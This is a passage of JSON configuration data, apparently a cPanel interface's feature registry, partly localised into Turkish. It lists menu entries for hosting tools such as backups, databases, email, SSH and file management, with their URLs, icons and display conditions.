Tarayıcı"},"jetbackupqueue":{"url":"jetbackup/index.html#!/queues","group":"jetbackup","searchtext":"Queue","description":"Queue","base64_png_image":"","feature":"jetbackupqueue","onclick":"","height":"48","imgtype":"icon","type":"image","plainitemdesc":"Queue","target":"","file":"jetbackupqueue","subtype":"img","acontent":"","itemdesc":"Queue","width":"48","itemorder":"8"},"errors":{"url":"stats/errlog.html","group":"metrics","feature":"errlog","onclick":"","height":"48","description":"View the most recent entries in the Apache® error logs.","searchtext":"Hatalar hata günlüğü hata günlüğü","key":"errors","base64_png_image":"","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Errors","target":"","imgtype":"icon","acontent":"","subtype":"img","width":"48","itemdesc":"Hatalar","itemorder":"2","file":"errors"},"apache_spam_assassin":{"url":"mail/spam/index.html","group":"email","implements":"Email_SpamFilter","feature":"spamassassin","onclick":"","height":"48","searchtext":"Filtering Spam Assassin spamassassin Apache SpamAssassin Spam Filters","description":"Configure the spam filter settings for your email account.","key":"apache_spam_assassin","base64_png_image":"","if":"$HASROLE{'SpamFilter'} && !$CONFIF{'skipspamassassin'}","type":"image","target":"","plainitemdesc":"Spam Filters","imgtype":"icon","acontent":"","subtype":"img","width":"48","itemdesc":"Spam Filters","itemorder":"13","file":"apache_spam_assassin"},"application_manager":{"onclick":"","feature":"passengerapps","height":"48","key":"application_manager","searchtext":"apps passenger ruby ror gems rails Application Manager","description":"Deploy applications with the Phusion Passenger® application server.","base64_png_image":"","url":"passenger/index.html","group":"software","subtype":"img","acontent":"","itemorder":"8","width":"48","itemdesc":"Application Manager","file":"application_manager","type":"image","target":"","plainitemdesc":"Application Manager","imgtype":"icon"},"change_password":{"plainitemdesc":"Password [output,amp] Security","target":"","type":"image","imgtype":"icon","itemorder":"1","width":"48","itemdesc":"Şifre & Güvenliği","acontent":"","subtype":"img","file":"change_password","group":"preferences","url":"passwd/index.html","implements":"Password_Change","height":"48","onclick":"","feature":"password","base64_png_image":"","key":"change_password","description":"Update your cPanel account’s password.","searchtext":"password & security change facebook external google secure cpanel Şifre & Güvenliği"},"perl_modules":{"group":"software","url":"module_installers/index.html?lang=perl","height":"48","onclick":"","feature":"modules-perl","base64_png_image":"","key":"perl_modules","description":"Search for and install Perl modules from the CPAN repository.","searchtext":"Perl Modülleri","target":"","plainitemdesc":"Perl Modules","type":"image","if":"$hasperl","imgtype":"icon","itemorder":"3","width":"48","itemdesc":"Perl Modülleri","subtype":"img","acontent":"","file":"perl_modules"},"postgresql_databases":{"imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","target":"","plainitemdesc":"PostgreSQL Databases","file":"postgresql_databases","acontent":"","subtype":"img","itemdesc":"PostgreSQL Veritabanları","width":"48","itemorder":"5","url":"psql/index.html","group":"databases","searchtext":"PostgreSQL Databases postgres database postgresql db PostgreSQL Veritabanları","description":"Create, manage, and delete PostgreSQL® databases and database users.","key":"postgresql_databases","base64_png_image":"","feature":"postgres","onclick":"","height":"48"},"disk_usage":{"feature":"diskusageviewer","onclick":"","height":"48","searchtext":"Disk Kullanımı disk alanı kullanımı disk kullanımı","description":"View information about your files, your directories, and how you use your disk space.","key":"disk_usage","base64_png_image":"","url":"diskusage/index.html","group":"files","acontent":"","subtype":"img","itemdesc":"Disk Kullanımı","width":"48","itemorder":"4","file":"disk_usage","if":"$HASROLE{'FileStorage'}","type":"image","target":"","plainitemdesc":"Disk Usage","imgtype":"icon"},"php_pg_admin":{"onclick":"","feature":"phppgadmin","height":"48","key":"php_pg_admin","description":"Manage PostgreSQL® databases.","searchtext":"phpPgAdmin database psql db","base64_png_image":"","url":"/3rdparty/phpPgAdmin/index.php","group":"databases","subtype":"img","acontent":"target=\"phppgadmin\"","itemorder":"7","itemdesc":"phpPgAdmin","width":"48","file":"php_pg_admin","type":"image","if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","target":"phppgadmin","plainitemdesc":"[asis,phpPgAdmin]","imgtype":"icon"},"group_advanced":{"group":"advanced","groupdesc":"Gelişmiş","height":"48","onclick":"","base64_png_image":"","description":"Gelişmiş","searchtext":"group_advanced","key":"group_advanced","target":"","type":"image","grouporder":"7","imgtype":"icon","width":"48","itemdesc":"group_advanced","subtype":"img","acontent":"","file":"group_advanced"},"api_shell":{"subtype":"img","acontent":"","itemdesc":"API Kabuğu","width":"48","itemorder":"9","file":"api_shell","if":"$isreseller && $CONFIF{'api_shell'}","type":"image","plainitemdesc":"API Shell","target":"","imgtype":"icon","feature":"api_shell","onclick":"","height":"48","description":"Run cPanel & WHM API functions.","searchtext":"API Kabuğu","key":"api_shell","base64_png_image":"","url":"api_shell/index.html","group":"advanced"},"autoresponders":{"subtype":"img","acontent":"","itemorder":"5","width":"48","itemdesc":"Otomatik Yanıtlayıcılar","file":"autoresponders","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","plainitemdesc":"Autoresponders","target":"","imgtype":"icon","onclick":"","feature":"autoresponders","height":"48","key":"autoresponders","searchtext":"Otomatik Yanıtlayıcılar otomatik yanıtlayıcı otomatik yanıtlayıcılar","description":"Configure automatic email response messages.","base64_png_image":"","url":"mail/autores.html","group":"email","implements":"Email_AutoResponders"},"archive":{"type":"image","if":"$HASROLE{'MailReceive'} && $CONFIF{'emailarchive'}","target":"","plainitemdesc":"Archive","imgtype":"icon","subtype":"img","acontent":"","itemorder":"14","width":"48","itemdesc":"Arşiv","file":"archive","url":"mail/archive.html","group":"email","implements":"Email_Archive","onclick":"","feature":"emailarchive","height":"48","key":"archive","searchtext":"e-posta arşivi E-posta Arşivleme","description":"Save incoming, outgoing, and mailing list messages for a specified amount of time.","base64_png_image":""},"forwarders":{"url":"mail/fwds.html","group":"email","implements":"Email_Forwarders","onclick":"","feature":"forwarders || emaildomainfwd","height":"48","key":"forwarders","searchtext":"İleticiler ilet","description":"Configure an email address to forward copies of incoming emails to another address.","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","plainitemdesc":"Forwarders","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"3","itemdesc":"İleticiler","width":"48","file":"forwarders"},"multiphp_manager":{"file":"multiphp_manager","itemorder":"8","width":"48","itemdesc":"MultiPHP Yöneticisi","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"MultiPHP Manager","type":"image","if":"$is_ea4","base64_png_image":"","key":"multiphp_manager","searchtext":"MultiPHP Yöneticisi","description":"Manage your PHP configuration.","height":"48","onclick":"","feature":"multiphp","group":"software","url":"multiphp_manager/index.html"},"jetbackupcronbackups":{"file":"jetbackupcronbackups","width":"48","itemdesc":"Cron Job Backups","itemorder":"3","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Cron Job Backups","type":"image","base64_png_image":"","description":"Cron Job Backups","searchtext":"Cron Job Backups","height":"48","feature":"jetbackupcronbackups","onclick":"","group":"jetbackup","url":"jetbackup/index.html#!/cronBackups"},"mod_security":{"base64_png_image":"","key":"mod_security","searchtext":"ModSecurity mod güvenliği mod_security","description":"Enable or disable ModSecurity® for your domains.","height":"48","onclick":"","feature":"modsecurity","group":"security","url":"security/mod_security/index.html","file":"mod_security","itemorder":"7","width":"48","itemdesc":"ModSecurity","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"ModSecurity","type":"image","if":"$HASROLE{'WebServer'} && $is_mod_security_installed"},"group_email":{"onclick":"","height":"48","description":"E-posta","searchtext":"group_email","key":"group_email","base64_png_image":"","group":"email","groupdesc":"E-posta","subtype":"img","acontent":"","itemdesc":"group_email","width":"48","file":"group_email","type":"image","if":"$HASROLE{'MailSend'} || $HASROLE{'MailReceive'} || $HASROLE{'DNS'} || $HASROLE{'CalendarContact'}","target":"","grouporder":"1","imgtype":"icon"},"global_email_filters":{"width":"48","itemdesc":"Genel E-posta Filtreleri","itemorder":"9","acontent":"","subtype":"img","file":"global_email_filters","plainitemdesc":"Global Email Filters","target":"","type":"image","if":"$HASROLE{'MailReceive'}","imgtype":"icon","height":"48","feature":"blockers","onclick":"","base64_png_image":"","description":"Configure how your server filters all of the email that your domains’ email accounts receive.","searchtext":"Genel E-Posta Filtreleri filtre hesap seviyesi filtreleme Genel E-posta Filtreleri","key":"global_email_filters","group":"email","url":"mail/filters/userfilters.html","implements":"Email_AccountLevelFiltering"},"backup_wizard":{"url":"backup/wizard.html","group":"files","onclick":"","feature":"backup","height":"48","key":"backup_wizard","description":"Back up all or part of your website, or restore it from the most recent backup file.","searchtext":"Yedekleme Sihirbazı geri yükleme","base64_png_image":"","type":"image","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","plainitemdesc":"Backup Wizard","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"9","width":"48","itemdesc":"Yedekleme Sihirbazı","file":"backup_wizard"},"mysql_database_wizard":{"file":"mysql_database_wizard","itemorder":"3","itemdesc":"MySQL® Veritabanı Sihirbazı","width":"48","subtype":"img","acontent":"","imgtype":"icon","plainitemdesc":"MySQL® Database Wizard","target":"","type":"image","if":"$SERVICEPROVIDED{'mysql'}","base64_png_image":"","key":"mysql_database_wizard","description":"Guided setup of a MySQL® database, database users, and user privileges.","searchtext":"MySQL Database Wizard mysql database db MySQL® Veritabanı Sihirbazı","height":"48","onclick":"","feature":"mysql","group":"databases","url":"sql/wizard1.html"},"calendar_and_contacts":{"implements":"Calendar_Configure","group":"email","url":"mail/calendars_and_contacts/index.html","base64_png_image":"","description":"Manage your CalDAV (calendar) and CardDAV (contacts) accounts.","searchtext":"e-posta takvim kişi adres defteri CalDAV CardDAV Takvimler ve Kişiler","key":"calendar_and_contacts","height":"48","feature":"caldavcarddav","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Calendars and Contacts","if":"$HASROLE{'CalendarContact'} && $hascpdavd && $hasccs","type":"image","file":"calendar_and_contacts","width":"48","itemdesc":"Takvimler ve Kişiler","itemorder":"18","acontent":"","subtype":"img"},"group_files":{"groupdesc":"Dosyalar","group":"files","base64_png_image":"","description":"Dosyalar","searchtext":"group_files","key":"group_files","height":"48","onclick":"","imgtype":"icon","grouporder":"2","target":"","type":"image","file":"group_files","width":"48","itemdesc":"group_files","acontent":"","subtype":"img"},"terminal":{"file":"terminal","acontent":"","subtype":"img","itemorder":"1","width":"48","itemdesc":"Terminal","imgtype":"icon","if":"$hasvalidshell && $HASROLE{'FileStorage'}","type":"image","plainitemdesc":"Terminal","target":"","key":"terminal","searchtext":"terminal bash tcsh command line shell ssh Terminal","description":"Access an in-browser terminal application for direct command-line access within a cPanel session.","base64_png_image":"","onclick":"","feature":"ssh","height":"48","url":"terminal/index.html","group":"advanced"},"postgresql_database_wizard":{"if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","type":"image","target":"","plainitemdesc":"PostgreSQL Database Wizard","imgtype":"icon","subtype":"img","acontent":"","itemorder":"6","itemdesc":"PostgreSQL Veritabanı Sihirbazı","width":"48","file":"postgresql_database_wizard","url":"psql/wizard1.html","group":"databases","onclick":"","feature":"postgres","height":"48","key":"postgresql_database_wizard","description":"Guided setup of a PostgreSQL® database, database users, and user privileges.","searchtext":"PostgreSQL Database Wizard postgres postgresql database db PostgreSQL Veritabanı Sihirbazı","base64_png_image":""},"jetbackupemailbackups":{"base64_png_image":"","description":"Email Backups","searchtext":"Email Backups","height":"48","onclick":"","feature":"jetbackupemailbackups","group":"jetbackup","url":"jetbackup/index.html#!/emailBackups","file":"jetbackupemailbackups","itemorder":"6","width":"48","itemdesc":"Email Backups","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"Email Backups","type":"image"},"mysql_databases":{"key":"mysql_databases","searchtext":"MySQL Databases db MySQL® Veritabanları","description":"Create, manage, and delete MySQL® databases and database users.","base64_png_image":"","onclick":"","feature":"mysql","height":"48","implements":"Database_MySQL","url":"sql/index.html","group":"databases","file":"mysql_databases","subtype":"img","acontent":"","itemorder":"2","width":"48","itemdesc":"MySQL® Veritabanları","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'mysql'}","plainitemdesc":"MySQL® Databases","target":""},"group_whmcs":{"file":"group_whmcs","subtype":"img","acontent":"","itemdesc":"group_whmcs","width":32,"grouporder":"1","imgtype":"icon","type":"image","target":"","description":"Billing & Support","searchtext":"group_whmcs","base64_png_image":"","onclick":"","height":32,"groupdesc":"Billing & Support","group":"whmcs"},"group_metrics":{"imgtype":"icon","grouporder":"5","target":"","type":"image","file":"group_metrics","width":"48","itemdesc":"group_metrics","subtype":"img","acontent":"","groupdesc":"Metrik","group":"metrics","base64_png_image":"","searchtext":"group_metrics","description":"Metrik","key":"group_metrics","height":"48","onclick":""},"jetbackupfullbackups":{"imgtype":"icon","target":"","plainitemdesc":"Full Account Backups","type":"image","file":"jetbackupfullbackups","width":"48","itemdesc":"Full Account Backups","itemorder":"1","acontent":"","subtype":"img","group":"jetbackup","url":"jetbackup/index.html#!/fullBackups","base64_png_image":"","searchtext":"Full Account Backups","description":"Full Account Backups","height":"48","feature":"jetbackupfullbackups","onclick":""},"redirects":{"onclick":"","feature":"redirects","height":"48","key":"redirects","description":"Send the visitors of a domain or particular page to a different URL.","searchtext":"Yeniden yönlendirmeler yeniden yaz mod yeniden yaz","base64_png_image":"","url":"mime/redirect.html","group":"domains","subtype":"img","acontent":"","itemorder":"6","itemdesc":"Yeniden yönlendirmeler","width":"48","file":"redirects","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Redirects","target":"","imgtype":"icon"},"webalizer_ftp":{"target":"","plainitemdesc":"Webalizer FTP","type":"image","if":"!$CONFIF{'skipwebalizer'}","imgtype":"icon","itemorder":"8","width":"48","itemdesc":"Webalizer FTP","subtype":"img","acontent":"","touch":"ftp","file":"webalizer_ftp","group":"metrics","url":"stats/webalizerftp_landing.html","height":"48","onclick":"","feature":"webalizer","base64_png_image":"","key":"webalizer_ftp","description":"View FTP traffic statistics from the Webalizer statistics program.","searchtext":"Webalizer FTP stats ftp"},"file_and_directory_restoration":{"group":"files","url":"file_and_directory_restoration/index.html","height":"48","onclick":"","feature":"filerestoration","base64_png_image":"","key":"file_and_directory_restoration","searchtext":"File directory restoration File and Directory Restoration","description":"Restore files from local backup sources.","target":"","plainitemdesc":"File and Directory Restoration","if":"$file_restoration_enabled && $HASROLE{'FileStorage'}","type":"image","imgtype":"icon","itemorder":"11","itemdesc":"File and Directory Restoration","width":"48","acontent":"","subtype":"img","file":"file_and_directory_restoration"},"analog_stats":{"onclick":"","feature":"analog","height":"48","key":"analog_stats","searchtext":"Analog İstatistikleri","description":"View data from the Analog traffic statistics software.","base64_png_image":"","url":"stats/analog_landing.html","group":"metrics","subtype":"img","acontent":"","itemorder":"6","itemdesc":"Analog İstatistikleri","width":"48","file":"analog_stats","type":"image","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipanalog'}","target":"","plainitemdesc":"Analog Stats","imgtype":"icon"},"cpanel-site-monitor":{"imgtype":"icon","search text keywords]'}":0,"if":"$HASROLE{'WebServer'} && $experimental{'cpanel-site-monitoring'}","type":"image","plainitemdesc":"cPanel Site Monitoring","target":"","file":"cpanel-site-monitor","acontent":"","subtype":"img","itemdesc":"cPanel Site Monitoring","width":"48","itemorder":"50","url":"site-monitor/index.html","group":"metrics","searchtext":"$LANG{'addon cpanel site monitoring domain website plugin[comment cPanel Site Monitoring","description":"cPanel Site Monitoring","base64_png_image":"","feature":"site_monitor","onclick":"","height":"48"},"group_software":{"subtype":"img","acontent":"","width":"48","itemdesc":"group_software","file":"group_software","if":"$HASROLE{'WebServer'}","type":"image","target":"","grouporder":"6","imgtype":"icon","onclick":"","height":"48","searchtext":"group_software","description":"Yazılım","key":"group_software","base64_png_image":"","group":"software","groupdesc":"Yazılım"},"ssh_access":{"url":"telnet/index.html","group":"security","onclick":"","feature":"ssh","height":"48","key":"ssh_access","description":"Manage your public and private SSH keys.","searchtext":"SSH erişimi ssh/kabuk Erişim ssh güvenli kabuk sftp SSH Erişimi","base64_png_image":"","type":"image","target":"","plainitemdesc":"SSH Access","imgtype":"icon","subtype":"img","acontent":"","itemorder":"1","itemdesc":"SSH Erişimi","width":"48","file":"ssh_access"},"team_manager":{"imgtype":"icon","plainitemdesc":"Manage Team","target":"","if":"$experimental{'p683'} && $has_team_license","type":"image","file":"team_manager","itemorder":5,"itemdesc":"Manage Team","width":48,"acontent":"","subtype":"img","group":"preferences","url":"team-manager/index.html","base64_png_image":"","key":"team_manager","searchtext":"manage team manager sub user subaccount subuser Manage Team","description":"Manage Team","height":48,"onclick":"","feature":"team_manager"},"jetbackupfilesbackups":{"description":"File Backups","searchtext":"File Backups","base64_png_image":"","onclick":"","feature":"jetbackupfilesbackups","height":"48","url":"jetbackup/index.html#!/fileBackups","group":"jetbackup","file":"jetbackupfilesbackups","subtype":"img","acontent":"","itemorder":"2","width":"48","itemdesc":"File Backups","imgtype":"icon","type":"image","target":"","plainitemdesc":"File Backups"},"apache_handlers":{"imgtype":"icon","plainitemdesc":"Apache Handlers","target":"","if":"$HASROLE{'WebServer'}","type":"image","file":"apache_handlers","width":"48","itemdesc":"Apache İşleyiciler","itemorder":"6","subtype":"img","acontent":"","group":"advanced","url":"mime/handle.html","base64_png_image":"","searchtext":"Apache İşleyiciler apache işleyiciler uzantı yapılandırması","description":"Control how your website’s Apache® web server software manages certain file types and file extensions.","key":"apache_handlers","height":"48","feature":"handlers","onclick":""},"backup":{"imgtype":"icon","target":"","plainitemdesc":"Backup","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","type":"image","file":"backup","itemorder":"9","itemdesc":"Yedekleme","width":"48","subtype":"img","acontent":"","implements":"Backups_Home","group":"files","url":"backup/index.html","base64_png_image":"","key":"backup","searchtext":"Yedeklemeyi geri yükle","description":"Download and store your website in a backup file.","height":"48","onclick":"","feature":"backup"},"directory_privacy":{"subtype":"img","acontent":"","width":"48","itemdesc":"Dizin Gizliliği","itemorder":"3","file":"directory_privacy","type":"image","if":"$HASROLE{'WebServer'}","plainitemdesc":"Directory Privacy","target":"","imgtype":"icon","feature":"webprotect","onclick":"","height":"48","description":"Protect specific directories in your files on your cPanel account.","searchtext":"Dizin Gizliliği şifre korumalı şifre korumalı","key":"directory_privacy","base64_png_image":"","url":"htaccess/index.html","group":"files"},"error_pages":{"file":"error_pages","acontent":"","subtype":"img","itemdesc":"Hata Sayfaları","width":"48","itemorder":"5","imgtype":"icon","type":"image","if":"$HASROLE{'WebServer'}","target":"","plainitemdesc":"Error Pages","searchtext":"Hata Sayfaları hata günlüğü hata_günlüğü hata günlüğü","description":"Inform visitors about problems when they attempt to access your website.","key":"error_pages","base64_png_image":"","feature":"errpgs","onclick":"","height":"48","url":"err/index.html","group":"advanced"},"anonymous_ftp":{"base64_png_image":"","key":"anonymous_ftp","description":"Define how anonymous users interact with your FTP server.","searchtext":"Anonim FTP anonymousftp","height":"48","onclick":"","feature":"ftpaccts","group":"files","url":"ftp/anonymous.html","file":"anonymous_ftp","itemorder":"8","width":"48","itemdesc":"Anonim FTP","subtype":"img","acontent":"","touch":"ftp","imgtype":"icon","plainitemdesc":"Anonymous FTP","target":"","type":"image","if":"$SERVICEPROVIDED{'ftp'} && $hasanonftp"},"mailscanner":{"base64_png_image":"","searchtext":"MailScanner","description":"MailScanner","height":"48","onclick":"","feature":"mailscanner","group":"email","url":"mailscanner/index.html","file":"mailscanner","itemorder":"999","itemdesc":"MailScanner","width":"48","subtype":"img","acontent":"","imgtype":"icon","plainitemdesc":"MailScanner","target":"","type":"image"},"ftp_connections":{"file":"ftp_connections","itemdesc":"FTP Bağlantıları","width":"48","itemorder":"7","touch":"ftp","subtype":"img","acontent":"","imgtype":"icon","target":"","plainitemdesc":"FTP Connections","if":"$SERVICEPROVIDED{'ftp'} && !$hascloudlinux","type":"image","base64_png_image":"","description":"View information about current connections to your FTP server and manage those connections.","searchtext":"FTP Bağlantıları ftp hesapları ftp oturum denetimi","key":"ftp_connections","height":"48","feature":"ftpaccts","onclick":"","group":"files","url":"ftp/session.html"},"remote_mysql":{"file":"remote_mysql","subtype":"img","acontent":"","itemorder":"4","itemdesc":"Uzak MySQL®","width":"48","imgtype":"icon","type":"image","if":"$SERVICEPROVIDED{'mysql'}","plainitemdesc":"Remote MySQL®","target":"","key":"remote_mysql","description":"Allow remote hosts (servers) to access MySQL® databases.","searchtext":"Remote MySQL db Uzak MySQL®","base64_png_image":"","onclick":"","feature":"mysql","height":"48","url":"sql/managehost.html","group":"databases"},"ruby_gems":{"imgtype":"icon","plainitemdesc":"RubyGems","target":"","if":"$hasgem","type":"image","file":"ruby_gems","itemorder":"4","width":"48","itemdesc":"RubyGems","subtype":"img","acontent":"","group":"software","url":"module_installers/index.html?lang=ruby","base64_png_image":"","key":"ruby_gems","description":"Distribute Ruby® programs and libraries.","searchtext":"RubyGems ror ruby gems rails","height":"48","onclick":"","feature":"modules-ruby"},"group_databases":{"target":"","type":"image","if":"$SERVICEPROVIDED{'mysql'} || $SERVICEPROVIDED{'postgresql'}","grouporder":"3","imgtype":"icon","itemdesc":"group_databases","width":"48","subtype":"img","acontent":"","file":"group_databases","group":"databases","groupdesc":"Veritabanları","height":"48","onclick":"","base64_png_image":"","description":"Veritabanları","searchtext":"group_databases","key":"group_databases"},"web_disk":{"group":"files","url":"webdav/accounts_webdav.html","base64_png_image":"","key":"web_disk","description":"Manage files on multiple types of devices.","searchtext":"Web Disk webdav webdisk","height":"48","onclick":"","feature":"webdisk","imgtype":"icon","target":"","plainitemdesc":"Web Disk","if":"$HASROLE{'WebDisk'} && $hascpdavd","type":"image","file":"web_disk","itemorder":"5","width":"48","itemdesc":"Web Disk","subtype":"img","acontent":""},"group_security":{"groupdesc":"Güvenlik","group":"security","key":"group_security","description":"Güvenlik","searchtext":"group_security","base64_png_image":"","onclick":"","height":"48","imgtype":"icon","grouporder":"6","type":"image","target":"","file":"group_security","acontent":"","subtype":"img","width":"48","itemdesc":"group_security"},"wp_softaculous":{"plainitemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","target":"","type":"image","imgtype":"icon","itemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","width":"48","itemorder":"1","acontent":"","subtype":"img","file":"wp_softaculous","group":"software","url":"softaculous/index.live.php?act=wordpress","implements":"Softaculous_WordPress","height":"48","feature":"wp_softaculous","onclick":"","base64_png_image":"","description":"WordPress Manager by OdeaWeb Kurulum Aracı","searchtext":"WordPress Manager by OdeaWeb Kurulum Aracı"},"email_routing":{"imgtype":"icon","type":"image","if":"$HASROLE{'MailReceive'} && !$HASCHILDNODE{Mail}","plainitemdesc":"Email Routing","target":"","file":"email_routing","subtype":"img","acontent":"","itemorder":"4","width":"48","itemdesc":"E-posta Yönlendirmesi","implements":"Email_Routing","url":"mail/email_routing.html","group":"email","key":"email_routing","searchtext":"MX Entry Email Routing dns E-posta Yönlendirmesi","description":"Configure how the system routes a domain’s incoming mail.","base64_png_image":"","onclick":"","feature":"changemx","height":"48"},"ruby_on_rails":{"group":"software","url":"ror/index.html","base64_png_image":"","searchtext":"Ruby on Rails","description":"Create and deploy a Ruby on Rails® application.","key":"ruby_on_rails","height":"48","feature":"ror","onclick":"","imgtype":"icon","target":"","plainitemdesc":"Ruby on Rails","if":"$hasrails","type":"image","file":"ruby_on_rails","width":"48","itemdesc":"Ruby on Rails","itemorder":"5","acontent":"","subtype":"img"},"bandwidth":{"file":"bandwidth","width":"48","itemdesc":"Bant Genişliği","itemorder":"3","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Bandwidth","if":"$SERVICEPROVIDED{'ftp'} || $HASROLE{'MailReceive'} || $HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"Bant Genişliği bandmin aktarımı","description":"View bandwidth usage graphs by protocol over multiple lengths of time.","key":"bandwidth","height":"48","feature":"bandwidth","onclick":"","group":"metrics","url":"stats/bandwidth.html"},"version_control":{"if":"$HASROLE{'FileStorage'}","type":"image","plainitemdesc":"[asis,Git™] Version Control","target":"","imgtype":"icon","subtype":"img","acontent":"","itemdesc":"Git™ Version Control","width":"48","itemorder":"10","file":"version_control","url":"version_control/index.html","group":"files","feature":"version_control","onclick":"","height":"48","searchtext":"Git version control vcs repositories repository repo master checkout check out branch clone remote source code commit head gitweb history log publish deployment build continuous integration Git™ Version Control","description":"Host Git™ repositories.","key":"version_control","base64_png_image":""},"manage_calendar_access":{"searchtext":"calendar delegation Calendar Delegation","description":"Delegate access rights for a user’s calendars to other users.","key":"manage_calendar_access","base64_png_image":"","feature":"manage_calendar_access","onclick":"","height":48,"url":"manage-calendar-access/index.html","group":"email","file":"manage_calendar_access","subtype":"img","acontent":"","itemdesc":"Calendar Delegation","width":48,"itemorder":18,"imgtype":"icon","if":"$ccs_installed && $calendar_delegation","type":"image","target":"","plainitemdesc":"Calendar Delegation"},"images":{"acontent":"","subtype":"img","width":"48","itemdesc":"Görüntüler","itemorder":"2","file":"images","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Images","target":"","imgtype":"icon","feature":"cpanelpro_images","onclick":"","height":"48","searchtext":"görüntü yöneticisi yeniden boyutlandırma yöneticisi ölçekleyici küçük resim yapıcı biçimi Görüntüler","description":"Modify and manage images saved to your cPanel account.","key":"images","base64_png_image":"","url":"cpanelpro/images.html","group":"files"},"php":{"key":"php","searchtext":"PHP yapılandırması","description":"Display your PHP configuration settings.","base64_png_image":"","onclick":"","feature":"php-config","height":"48","url":"php/index.html?lang","group":"software","file":"php","acontent":"","subtype":"img","itemorder":"1","width":"48","itemdesc":"PHP","imgtype":"icon","if":"!$is_ea4","type":"image","target":"","plainitemdesc":"PHP"},"group_soft_div":{"file":"group_soft_div","subtype":"img","acontent":"","itemdesc":"group_soft_div","width":"32","grouporder":"10","imgtype":"icon","type":"image","target":"","description":"Softaculous Apps Installer","searchtext":"group_soft_div","base64_png_image":"","onclick":"","height":"32","groupdesc":"Softaculous Apps Installer","group":"soft_div"},"file_manager":{"file":"file_manager","itemorder":"1","width":"48","itemdesc":"Dosya Yöneticisi","subtype":"img","acontent":"target=\"file_manager\"","imgtype":"icon","plainitemdesc":"File Manager","target":"file_manager","type":"image","if":"$HASROLE{'FileStorage'}","base64_png_image":"","key":"file_manager","description":"Manage and edit your files.","searchtext":"Dosya Yöneticisi dosya yöneticisi","height":"48","onclick":"","feature":"filemanager","implements":"FileManager_Home","group":"files","url":"filemanager/index.html"},"cpanel-koality-plugin":{"file":"cpanel-koality-plugin","itemorder":"2","itemdesc":"Site Quality Monitoring","width":"48","acontent":"","subtype":"img","imgtype":"icon","target":"","plainitemdesc":"Site Quality Monitoring","if":"$HASROLE{'WebServer'}","type":"image","base64_png_image":"","searchtext":"website quality check monitor plugin Site Quality Monitoring","description":"Site Quality Monitoring","height":"48","onclick":"","feature":"koality","group":"metrics","url":"koality/signup/index.html"},"awstats":{"base64_png_image":"","key":"awstats","description":"View traffic statistics from the AWStats software.","searchtext":"Awstats awstats","height":"48","onclick":"","feature":"awstats","implements":"Stats_AWStats","group":"metrics","url":"stats/awstats_landing.html","file":"awstats","itemorder":"5","itemdesc":"Awstats","width":"48","acontent":"","subtype":"img","imgtype":"icon","plainitemdesc":"Awstats","target":"","type":"image","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipawstats'}"},"tls_wizard":{"width":"48","itemdesc":"SSL/TLS Sihirbazı","itemorder":"6","subtype":"img","acontent":"","file":"tls_wizard","target":"","plainitemdesc":"[asis,SSL]/[asis,TLS] Wizard","if":"$HASROLE{'UserSSL'} && $market_has_enabled_providers","type":"image","imgtype":"icon","height":"48","feature":"market && tls_wizard && sslinstall","onclick":"","base64_png_image":"","searchtext":"SSL/TLS Sihirbazı","description":"Purchase and install SSL certificates for your domains.","key":"tls_wizard","group":"security","url":"security/tls_wizard/","implements":"SSL_TLS_Wizard"},"api_tokens":{"url":"api_tokens/index.html","group":"security","implements":"API_Tokens_Manager","onclick":"","feature":"apitokens","height":"48","key":"api_tokens","searchtext":"Manage API Tokens access api connect login","description":"Create, manage, and delete API tokens.","base64_png_image":"","type":"image","plainitemdesc":"Manage API Tokens","target":"","imgtype":"icon","subtype":"img","acontent":"","itemorder":"4","itemdesc":"Manage API Tokens","width":"48","file":"api_tokens"},"jetbackupdnsbackups":{"width":"48","itemdesc":"DNS Zone Backups","itemorder":"4","acontent":"","subtype":"img","file":"jetbackupdnsbackups","plainitemdesc":"DNS Zone Backups","target":"","type":"image","imgtype":"icon","height":"48","feature":"jetbackupdnsbackups","onclick":"","base64_png_image":"","searchtext":"DNS Zone Backups","description":"DNS Zone Backups","group":"jetbackup","url":"jetbackup/index.html#!/dnsBackups"},"lvephpsel":{"acontent":"","subtype":"img","width":"48","itemdesc":"Select PHP Version","itemorder":"999","file":"lvephpsel","type":"image","plainitemdesc":"Select PHP Version","target":"","imgtype":"icon","feature":"lvephpsel","onclick":"","height":"48","searchtext":"Select PHP Version","description":"Select PHP Version","base64_png_image":"","url":"lveversion/php_selector.live.pl","group":"software"},"mime_types":{"target":"","plainitemdesc":"MIME Types","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","itemorder":"7","width":"48","itemdesc":"MIME Türleri","subtype":"img","acontent":"","file":"mime_types","group":"advanced","url":"mime/mime.html","height":"48","onclick":"","feature":"mime","base64_png_image":"","key":"mime_types","searchtext":"MIME Türleri mimetype türler","description":"Relay information to the visitor’s browser about how to handle file extensions."},"softaculous":{"url":"softaculous/index.live.php","group":"software","implements":"Softaculous_Home","feature":"softaculous","onclick":"","height":"48","searchtext":"Softaculous Apps Installer","description":"Softaculous Apps 